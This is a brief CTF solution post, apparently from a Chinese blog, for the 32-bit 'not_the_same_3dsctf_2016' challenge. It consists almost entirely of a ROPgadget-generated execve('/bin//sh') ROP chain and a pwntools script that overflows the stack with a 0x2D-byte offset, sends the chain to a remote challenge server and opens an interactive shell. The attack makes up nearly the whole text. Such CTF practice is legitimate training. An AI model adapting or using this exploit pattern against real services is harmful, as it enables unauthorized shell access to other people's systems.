ROPgadget --binary not_the_same_3dsctf_2016 --ropchain
自动生成
from struct import pack
p = ''
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0806d8a5) # int 0x80
加上自己算的偏移
from pwn import *
from struct import pack
elf = ELF("./not_the_same_3dsctf_2016")
#sh = process("./not_the_same_3dsctf_2016")
sh = remote("node3.buuoj.cn",26066)
context.log_level = "debug"
context.arch = "i386"
p = cyclic(0x2D)
p += ''
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0806d8a5) # int 0x80
sh.sendline(p)
sh.interactive()
「真诚赞赏,手留余香」
Mr.Be1ieVe's Treasure
真诚赞赏,手留余香
使用微信扫描二维码完成支付
